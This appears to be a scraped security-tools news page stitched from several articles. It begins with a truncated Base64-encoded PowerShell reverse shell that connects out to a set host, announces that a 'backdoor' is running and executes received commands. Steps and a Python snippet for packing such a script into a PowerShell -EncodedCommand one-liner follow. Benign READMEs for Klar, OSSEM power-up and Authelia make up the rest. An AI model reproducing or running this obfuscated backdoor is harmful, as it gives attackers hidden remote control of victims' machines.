AZgBmAGUAcgAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAHcAcgBpAHQAZQByACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJACQAZABhAHQAYQAgAD0AIAAkAG4AdQBsAGwAOwANAAoACQAkAHIAZQBzAHUAbAB0ACAAPQAgACQAbgB1AGwAbAA7AA0ACgAJAHQAcgB5ACAAewANAAoACQAJACMAIABjAGgAYQBuAGcAZQAgAHQAaABlACAAaABvAHMAdAAgAGEAZABkAHIAZQBzAHMAIABhAG4AZAAvAG8AcgAgAHAAbwByAHQAIABuAHUAbQBiAGUAcgAgAGEAcwAgAG4AZQBjAGUAcwBzAGEAcgB5AA0ACgAJAAkAJABzAG8AYwBrAGUAdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABjAHAAQwBsAGkAZQBuAHQAKAAkAGEAZABkAHIALAAgACQAcABvAHIAdAApADsADQAKAAkACQAkAHMAdAByAGUAYQBtACAAPQAgACQAcwBvAGMAawBlAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwANAAoACQAJACQAYgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAEIAeQB0AGUAWwBdACAAMQAwADIANAA7AA0ACgAJAAkAJABlAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBBAHMAYwBpAGkARQBuAGMAbwBkAGkAbgBnADsADQAKAAkACQAkAHcAcgBpAHQAZQByACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBXAHIAaQB0AGUAcgAoACQAcwB0AHIAZQBhAG0AKQA7AA0ACgAJAAkAJAB3AHIAaQB0   AGUAcgAuAEEAdQB0AG8ARgBsAHUAcwBoACAAPQAgACQAdAByAHUAZQA7AA0ACgAJAAkAVwByAGkAdABlAC0ASABvAHMAdAAgACIAQgBhAGMAawBkAG8AbwByACAAaQBzACAAdQBwACAAYQBuAGQAIAByAHUAbgBuAGkAbgBnAC4ALgAuACIAOwANAAoACQAJAGQAbwAgAHsADQAKAAkACQAJACQAdwByAGkAdABlAHIALgBXAHIAaQB0AGUAKAAiAFAAUwA+ACIAKQA7AA0ACgAJAAkACQBkAG8AIAB7AA0ACgAJAAkACQAJACQAYgB5AHQAZQBzACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHUAZgBmAGUAcgAuAEwAZQBuAGcAdABoACkAOwANAAoACQAJAAkACQBpAGYAIAAoACQAYgB5AHQAZQBzACAALQBnAHQAIAAwACkAIAB7AA0ACgAJAAkACQAJAAkAJABkAGEAdABhACAAPQAgACQAZABhAHQAYQAgACsAIAAkAGUAbgBjAG8AZABpAG4AZwAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHUAZgBmAGUAcgAsACAAMAAsACAAJABiAHkAdABlAHMAKQA7AA0ACgAJAAkACQAJAH0AIABlAGwAcwBlACAAewANAAoACQAJAAkACQAJACQAZABhAHQAYQAgAD0AIAAiAGUAeABpAHQAIgA7AA0ACgAJAAkACQAJAH0ADQAKAAkACQAJAH0AIAB3AGgAaQBsAGUAIAAoACQAcwB0AHIAZQBhAG0ALgBEAGEAdABhAEEAdgBhAGkAbABhAGIAbABlACkAOwANAAoACQAJAAkAaQBmACAAKAAkAGQAYQB0AGEALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAAgAC0AYQBuAGQAIAAkAGQAYQB0AGEAI   AAtAG4AZQAgACIAZQB4AGkAdAAiACkAIAB7AA0ACgAJAAkACQAJAHQAcgB5ACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJABkAGEAdABhACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAOwANAAoACQAJAAkACQB9ACAAYwBhAHQAYwBoACAAewANAAoACQAJAAkACQAJACQAcgBlAHMAdQBsAHQAIAA9ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsADQAKAAkACQAJAAkAfQANAAoACQAJAAkACQAkAHcAcgBpAHQAZQByAC4AVwByAGkAdABlAEwAaQBuAGUAKAAkAHIAZQBzAHUAbAB0ACkAOwANAAoACQAJAAkACQBDAGwAZQBhAHIALQBWAGEAcgBpAGEAYgBsAGUAIAAtAE4AYQBtAGUAIAAiAGQAYQB0AGEAIgA7AA0ACgAJAAkACQB9AA0ACgAJAAkAfQAgAHcAaABpAGwAZQAgACgAJABkAGEAdABhACAALQBuAGUAIAAiAGUAeABpAHQAIgApADsADQAKAAkAfQAgAGMAYQB0AGMAaAAgAHsADQAKAAkACQBXAHIAaQB0AGUALQBIAG8AcwB0ACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBJAG4AbgBlAHIARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlADsADQAKAAkAfQAgAGYAaQBuAGEAbABsAHkAIAB7AA0ACgAJAAkAaQBmACAAKAAkAHMAbwBjAGsAZQB0ACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsADQAKAAkACQAJACQAcwBvAGMAawBlAH   
QALgBDAGwAbwBzAGUAKAApADsADQAKAAkACQAJACQAcwBvAGMAawBlAHQALgBEAGkAcwBwAG8AcwBlACgAKQA7AA0ACgAJAAkAfQANAAoACQAJAGkAZgAgACgAJABzAHQAcgBlAGEAbQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AA0ACgAJAAkACQAkAHMAdAByAGUAYQBtAC4AQwBsAG8AcwBlACgAKQA7AA0ACgAJAAkACQAkAHMAdAByAGUAYQBtAC4ARABpAHMAcABvAHMAZQAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAYgB1AGYAZgBlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJABiAHUAZgBmAGUAcgAuAEMAbABlAGEAcgAoACkAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAdwByAGkAdABlAHIAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEMAbABvAHMAZQAoACkAOwANAAoACQAJAAkAJAB3AHIAaQB0AGUAcgAuAEQAaQBzAHAAbwBzAGUAKAApADsADQAKAAkACQB9AA0ACgAJAAkAaQBmACAAKAAkAGQAYQB0AGEAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgBkAGEAdABhACIAOwANAAoACQAJAH0ADQAKAAkACQBpAGYAIAAoACQAcgBlAHMAdQBsAHQAIAAtAG4AZQAgACQAbgB1AGwAbAApACAAewANAAoACQAJAAkAQwBsAGUAYQByAC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAIgByAGUAcwB1AGwAdAAiADsADQA   KAAkACQB9AA0ACgAJAH0ADQAKAH0ADQAKAA==
To generate a PowerShell encoded command from a PowerShell script, run the following PowerShell command:
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes([IO.File]::ReadAllText($script)))
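The same encoding can be reproduced outside PowerShell, since -EncodedCommand expects Base64 over the script's UTF-16LE ("Unicode") bytes; here is a small Python equivalent (the file name is assumed):

import base64

with open("powershell_reverse_tcp.ps1", encoding="utf-8") as f:
    script = f.read()
# PowerShell's [Text.Encoding]::Unicode is UTF-16LE
encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
print("PowerShell -ExecutionPolicy Unrestricted -EncodedCommand " + encoded)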

Images




Klar - Integration Of Clair And Docker Registry


Integration of Clair and Docker Registry (supports both Clair API v1 and v3)
Klar is a simple tool to analyze images stored in a private or public Docker registry for security vulnerabilities using Clair https://github.com/coreos/clair. Klar is designed to be used as an integration tool, so it relies on environment variables. It's a single binary which requires no dependencies.
Klar serves as a client which coordinates the image checks between the Docker registry and Clair.

Binary installation
The simplest way is to download the latest release (for OSX and Linux) from https://github.com/optiopay/klar/releases/ and put the binary in a folder in your PATH (make sure it has execute permission).

Installation from source code
Make sure you have the Go compiler installed and configured https://golang.org/doc/install
Then run
go get github.com/optiopay/klar
make sure your Go binary folder is in your PATH (e.g. export PATH=$PATH:/usr/local/go/bin)

Usage
Klar returns 0 if the number of detected high severity vulnerabilities in an image is less than or equal to a threshold (see below), and 1 if there were more. It returns 2 if an error has prevented the image from being analyzed.
Klar can be configured via the following environment variables:
  • CLAIR_ADDR - address of Clair server. It has a form of protocol://host:port - protocol and port default to http and 6060 respectively and may be omitted. You can also specify basic authentication in the URL: protocol://login:password@host:port.
  • CLAIR_OUTPUT - severity level threshold, vulnerabilities with severity level higher than or equal to this threshold will be outputted. Supported levels are Unknown, Negligible, Low, Medium, High, Critical, Defcon1. Default is Unknown.
  • CLAIR_THRESHOLD - how many outputted vulnerabilities Klar can tolerate before returning 1. Default is 0.
  • CLAIR_TIMEOUT - timeout in minutes before Klar cancels the image scanning. Default is 1
  • DOCKER_USER - Docker registry account name.
  • DOCKER_PASSWORD - Docker registry account password.
  • DOCKER_TOKEN - Docker registry account token. (Can be used in place of DOCKER_USER and DOCKER_PASSWORD)
  • DOCKER_INSECURE - Allow Klar to access registries with bad SSL certificates. Default is false. Clair will need to be booted with -insecure-tls for this to work.
  • DOCKER_TIMEOUT - timeout in minutes when trying to fetch layers from a docker registry
  • DOCKER_PLATFORM_OS - The operating system of the Docker image. Default is linux. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.
  • DOCKER_PLATFORM_ARCH - The architecture the Docker image is optimized for. Default is amd64. This only needs to be set if the image specified references a Docker ManifestList instead of a usual manifest.
  • REGISTRY_INSECURE - Allow Klar to access insecure registries (HTTP only). Default is false.
  • JSON_OUTPUT - Output JSON, not plain text. Default is false.
  • FORMAT_OUTPUT - Output format of the vulnerabilities. Supported formats are standard, json, table. Default is standard. If JSON_OUTPUT is set to true, this option is ignored.
  • WHITELIST_FILE - Path to the YAML file with the CVE whitelist. Look at whitelist-example.yaml for the file format.
  • IGNORE_UNFIXED - Do not count vulnerabilities without a fix towards the threshold
Usage:
CLAIR_ADDR=localhost CLAIR_OUTPUT=High CLAIR_THRESHOLD=10 DOCKER_USER=docker DOCKER_PASSWORD=secret klar postgres:9.5.1
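In a pipeline you would typically branch on the exit codes described above; here is a minimal Python wrapper sketch (the image name and threshold values are placeholders, not part of Klar):

import os
import subprocess
import sys

# placeholder configuration; adjust for your Clair setup and registry
env = dict(os.environ, CLAIR_ADDR="localhost", CLAIR_OUTPUT="High",
           CLAIR_THRESHOLD="10")
rc = subprocess.run(["klar", "postgres:9.5.1"], env=env).returncode
if rc == 0:
    print("vulnerabilities within threshold")
elif rc == 1:
    sys.exit("too many high severity vulnerabilities")
else:  # rc == 2: an error prevented the scan
    sys.exit("image could not be analyzed")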

Debug Output
You can enable more verbose output by setting KLAR_TRACE to true.
  • run export KLAR_TRACE=true to persist between runs.

Dockerized version
Klar can be dockerized. Go to $GOPATH/src/github.com/optiopay/klar and build Klar in project root. If you are on Linux:
CGO_ENABLED=0 go build -a -installsuffix cgo .
If you are on Mac don't forget to build it for Linux:
GOOS=linux go build .
To build Docker image run in the project root (replace klar with fully qualified name if you like):
docker build -t klar .
Then pass env vars as separate --env arguments, or create an env file and pass it as --env-file argument. For example save env vars as my-klar.env:
CLAIR_ADDR=localhost
CLAIR_OUTPUT=High
CLAIR_THRESHOLD=10
DOCKER_USER=docker
DOCKER_PASSWORD=secret
Then run
docker run --env-file=my-klar.env klar postgres:9.5.1

Amazon ECR support
There is no permanent username/password for Amazon ECR; the credentials must be retrieved using aws ecr get-login and are valid for 12 hours. Here is a sample script which may be used to provide Klar with ECR credentials:
DOCKER_LOGIN=`aws ecr get-login --no-include-email`
PASSWORD=`echo $DOCKER_LOGIN | cut -d' ' -f6`
REGISTRY=`echo $DOCKER_LOGIN | cut -d' ' -f7 | sed "s/https:\/\///"`
DOCKER_USER=AWS DOCKER_PASSWORD=${PASSWORD} ./klar ${REGISTRY}/my-image
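Note: newer versions of the AWS CLI (v2) replaced aws ecr get-login with aws ecr get-login-password, so on those versions the value for DOCKER_PASSWORD can be obtained from that command instead.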

Google GCR support
For authentication against GCR (Google Container Registry), the easiest way is to use the application default credentials. These only work when running Klar from GCP. The only requirement is the Google Cloud SDK.
DOCKER_USER=oauth2accesstoken
DOCKER_PASSWORD="$(gcloud auth application-default print-access-token)"
With Docker:
DOCKER_USER=oauth2accesstoken
DOCKER_PASSWORD="$(docker run --rm google/cloud-sdk:alpine gcloud auth application-default print-access-token)"


OSSEM - A Tool To Assess Data Quality


A tool to assess data quality, built on top of the awesome OSSEM project.

Mission
  • Answer the question: I want to start hunting ATT&CK techniques, what log sources and events are more suitable?
  • Create transparency on the strengths and weaknesses of your log sources
  • Provide an easy way to evaluate your logs

OSSEM Power-up Overview
Power-up uses the OSSEM Detection Data Model (DDM) as the foundation of its data quality assessment, mainly because the DDM provides a structured way to correlate ATT&CK Data Sources, Common Information Model (CIM) entities, and Data Dictionaries (events) with each other.
For those unfamiliar with the DDM structure, here is a sample:
ATT&CK Data Source | Sub Data Source | Source Data Object | Relationship | Destination Data Object | EventID
Process monitoring | process creation | process | created | process | 4688
Process monitoring | process creation | process | created | process | 1
Process monitoring | process termination | process | terminated | - | 4689
Process monitoring | process termination | process | terminated | - | 5
As you can see, each entry in the DDM defines a sub data source (scope) using abstract entities like process, user, file, etc. Each of these entries also contains an event ID where the scope applies. You can read more about these entities here.
In a nutshell, DDM entries play a major role in removing the complexity of raw events, by providing a scope that defines how a log source (data channel) can be consumed.

Data Quality Dimensions
Power-up assesses data quality score according to five distinct dimensions:
Dimension | Type | Description
Coverage | Data channel | How many devices or network segments are covered by the data channel
Timeliness | Data channel | How long it takes for the event to become available
Retention | Data channel | How long the event remains available
Structure | Event | How complete the event is, i.e. whether the relevant fields are available
Consistency | Event | How standard the event fields are, i.e. whether the fields have been normalized
Every dimension is rated with a score between 0 (none) and 5 (excellent).

Coverage, Timeliness and Retention
These dimensions are tied to data channels, and propagate to all events provided by them.
Due to the nature of these dimensions, they must be rated manually, according to the specificities of the data channels.
Power-up uses resources/dcs.yml to define data channels and rate these dimensions:
data channel: sysmon
description: sysmon monitoring
coverage: 2
timeliness: 5
retention: 2
---
data channel: security
description: windows security auditing
coverage: 5
timeliness: 5
retention: 2
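Since dcs.yml is a multi-document YAML file (note the --- separator), it can be read with PyYAML's safe_load_all; a hedged sketch, not power-up's own loader:

import yaml

with open("resources/dcs.yml") as f:
    for dc in yaml.safe_load_all(f):
        # each document rates one data channel
        print(dc["data channel"], dc["coverage"], dc["timeliness"], dc["retention"])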

Structure
In order to calculate how complete the event structure is, power-up compares the data dictionary standard names with the fields of the entities (CIM) referenced in the DDM entry (source and destination).
Because not all entity fields are relevant (it depends on the context), power-up uses the concept of profiles to select which fields need to match the data dictionary standard names. For example:
# OSSEM CIM Profile
process:
- process_name
- process_path
- process_command_line
Note: There is an example profile in profiles/default.yml for you to play with.
The structure score is calculated with the following formula:
SCORE_PERCENT = (MATCHED_FIELDS / TOTAL_RELEVANT_FIELDS) * 100
For the sake of clarity, here is an example of how structure score is calculated:


Note: Because the Sysmon Event ID 1 data dictionary matches 100% of the relevant entity fields, the structure score is rated 5 (excellent).
The structure score is translated to the 0-5 scale in the following way:
Percentage | Score
0 | 0
1 to 25 | 1
26 to 50 | 2
51 to 75 | 3
76 to 99 | 4
100 | 5
Note: Depending on the use case (SIEM, Threat Hunting, Forensics), you can define different profiles so that you can rate your logs differently.

Consistency
To calculate consistency, power-up simply calculates the percentage of fields in a data dictionary that have a standard name. Data dictionaries with a high number of fields mapped to a standard name are more likely to correlate with CIM entities.
The consistency score is calculated with the following formula:
SCORE_PERCENT = (STANDARD_NAME_FIELDS / TOTAL_FIELDS) * 100
The consistency score is translated to the 0-5 scale in the following way:
Percentage | Score
0 | 0
1 to 50 | 1
51 to 99 | 3
100 | 5
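Both formulas and both translation tables are easy to reproduce; here is a minimal Python condensation (function names and layout are mine, not power-up's code):

# 0-5 translation tables from the two score scales above
STRUCTURE_SCALE = [(0, 0), (25, 1), (50, 2), (75, 3), (99, 4), (100, 5)]
CONSISTENCY_SCALE = [(0, 0), (50, 1), (99, 3), (100, 5)]

def percent_to_score(percent, scale):
    # return the score of the first bracket whose upper bound fits
    for upper_bound, score in scale:
        if percent <= upper_bound:
            return score
    return scale[-1][1]

def structure_score(matched_fields, total_relevant_fields):
    return percent_to_score(100 * matched_fields / total_relevant_fields, STRUCTURE_SCALE)

def consistency_score(standard_name_fields, total_fields):
    return percent_to_score(100 * standard_name_fields / total_fields, CONSISTENCY_SCALE)

print(structure_score(3, 3))    # 100% -> 5
print(consistency_score(2, 4))  # 50%  -> 1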

How to use

Before you start
  • Power-up is a Python script; be sure to pip install -r requirements.txt
  • Be sure to have a local copy of the OSSEM repository

Running power-up
$> python3 powerup.py --help
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

usage: powerup.py [-h] [-o OSSEM] [-y OSSEM_YAML] [-p PROFILE] [--excel]
[--elastic] [--yaml]

A tool to assess ATT&CK data source coverage, built on top of awesome OSSEM.

optional arguments:
-h, --help show this help message and exit
-o OSSEM, --ossem OSSEM
path to import OSSEM markdown
-y OSSEM_YAML, --ossem-yaml OSSEM_YAML
path to import OSSEM yaml
-p PROFILE, --profile PROFILE
path to CIM profile
--excel export OSSEM DDM to excel
--elastic export OSSEM data models to elastic
--yaml export OSSEM data models to yaml
--layer export OSSEM data models to navigator layer
As you can see power-up can consume OSSEM data from two different formats:
  • OSSEM markdown - The native format of OSSEM when you clone from git.
  • OSSEM yaml - A summarized format of OSSEM, containing only the data fields and a few metadata. You can use power-up to convert OSSEM markdown to yaml.
Currently, Power-up exports OSSEM output to:
  • Yaml - Creates OSSEM structures in yaml, in the output/ folder
  • Excel - Creates an OSSEM DDM table, enriched with the data quality scores, in the output/ folder
  • Elastic - Creates an OSSEM structure in elastic, the indexes are as follows:
    • ossem.ddm - OSSEM DDM table, enriched with the data quality scores
    • ossem.cim - OSSEM CIM entries
    • ossem.dds - OSSEM Data Dictionaries
    • ossem.dcs - OSSEM Data Channels
Note: if no profile file path is specified, power-up uses profiles/default.yml by default.

Exporting to YAML
$> python3 powerup.py -o ../OSSEM --yaml
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM to YAML
[*] Created output/ddm_20191114_160246.yml
[*] Created output/cim_20191114_160246.yml
[*] Created output/dds_20191114_160246.yml
The goal of exporting/importing to/from YAML is to facilitate OSSEM customization. Chances are that the first thing you will do is create your own data dictionaries and then add new DDM entries, so YAML will make updates easier.
Note 1: modify resources/config.yml to instruct power-up about the file names of the correct structures. Then you just need to place them in a folder and pass that folder to the OSSEM_YAML argument.
Note 2: power-up does not parse entire OSSEM objects to YAML, only the data fields and some metadata (i.e. description). The reason for this is that I wanted to keep the YAML objects as lean as possible, with just the data you need to assess data quality.

Exporting to EXCEL
$> python3 powerup.py -o ../OSSEM --excel
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM DDM to Excel
[*] Saved Excel to output/ddm_enriched_20191114_160041.xlsx
When exporting to Excel, power-up will create an eye-candy DDM, with the respective data quality dimensions for every entry:


Exporting to ELASTIC
$> python3 powerup.py -o ../OSSEM --elastic
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM to Elastic
[*] Creating elastic index ossem.ddm
[*] Creating elastic index ossem.cim
[*] Creating elastic index ossem.dds
[*] Creating elastic index ossem.dcs
When exporting to Elastic, power-up will store all OSSEM data in elastic. Because the DDM is also enriched with the respective data quality dimensions, you will be able to create dashboards like this:


Exporting to ATT&CK Navigator
$> python3 powerup.py -o ../OSSEM --layer
_____ _____ _____ _____ _____ _____ _____ _ _ _ _____ _____ _____ _____ __
| | __| __| __| | | _ | | | | | __| __ |___| | | _ | |
| | |__ |__ | __| | | | | __| | | | | | __| -|___| | | __|__|
|_____|_____|_____|_____|_|_|_| |__| |_____|_____|_____|__|__| |_____|__| |__|

[*] Profile path: profiles/default.yml
[*] Parsing OSSEM from markdown
[*] Exporting OSSEM to Naviagator Layer
[*] Pulling ATT&CK data
[*] Generating data source quality layer
[*] Created output/ds_layer_20191119_220141.json
When exporting to layer, power-up will create an Attack Navigator Layer JSON file, with the respective data quality dimensions for every technique:


Note: technique scores are derived from the data sources' average scores in the DDM.

Acknowledgements

To-Do
  • Create additional documentation
  • Export to ATT&CK Navigator Layer
  • Properly handle data dictionaries that share the same data channel, but have different schema depending on the operating system
  • Provide Kibana objects (visualizations and dashboards)


Authelia - The Single Sign-On Multi-Factor Portal For Web Apps


Authelia is an open-source authentication and authorization server providing two-factor authentication and single sign-on (SSO) for your applications via a web portal. It acts as a companion to reverse proxies like nginx, Traefik or HAProxy to let them know whether requests should pass through. Unauthenticated users are redirected to the Authelia sign-in portal instead.
Documentation is available at https://docs.authelia.com.

Authelia can be installed as a standalone service from the AUR, using a Static binary, Docker or can also be deployed easily on Kubernetes leveraging ingress controllers and ingress configuration.

Here is what Authelia's portal looks like



Features summary
Here is the list of the main available features:
For more details about the features, follow Features.

Proxy support
Authelia works in combination with nginx, Traefik or HAProxy. It can be deployed on bare metal with Docker or on top of Kubernetes.

Getting Started
You can start utilising Authelia with the provided docker-compose bundles:

Local
The Local compose bundle is intended to test Authelia without worrying about configuration. It's meant for scenarios where the server will not be exposed to the internet. Domains will be defined in the local hosts file and self-signed certificates will be utilised.

Lite
The Lite compose bundle is intended for scenarios where the server will be exposed to the internet; domains and DNS will need to be set up accordingly, and certificates will be generated through Let's Encrypt. The Lite element refers to minimal external dependencies: file-based user storage and SQLite-based configuration storage. In this configuration, the service will not scale well.

Full
The Full compose bundle is intended for scenarios where the server will be exposed to the internet; domains and DNS will need to be set up accordingly, and certificates will be generated through Let's Encrypt. The Full element refers to a scalable setup which includes external dependencies: LDAP-based user storage and database-based configuration storage (MariaDB, MySQL or Postgres).

Deployment
Now that you have tested Authelia and you want to try it out in your own infrastructure, you can learn how to deploy and use it with Deployment. This guide will show you how to deploy it on bare metal as well as on Kubernetes.

Security
Security is taken very seriously here; therefore we follow the rule of responsible disclosure, and we encourage you to do so as well.
If you would like to report a vulnerability discovered in Authelia, please first contact clems4ever on Matrix or by email.
For details about security measures implemented in Authelia, please follow this link.

Breaking changes
See BREAKING.

Contribute
If you want to contribute to Authelia, check the documentation available here.

Contributors
Authelia exists thanks to all the people who contribute. [Contribute].

Backers
Thank you to all our backers! [Become a backer] and help us sustain our community.
